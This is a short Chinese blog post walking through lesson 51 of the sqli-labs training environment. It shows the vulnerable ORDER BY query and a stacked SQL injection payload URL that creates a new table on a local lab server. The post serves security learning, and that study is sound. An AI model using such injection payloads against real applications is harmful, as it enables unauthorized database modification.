Sqli-labs less 51

Less-51

本关的sql语句为    $sql="SELECT * FROM users ORDER BY '$id'";

我们此处要进行stacked injection,要注释掉',此处给出payload:

http://127.0.0.1/sqli-labs/Less-51/index.php?sort=1%27;create%20table%20less51%20like%20users--+

创建表less51

posted @ 2016-08-11 21:36  lcamry  阅读(474)  评论(0编辑  收藏  举报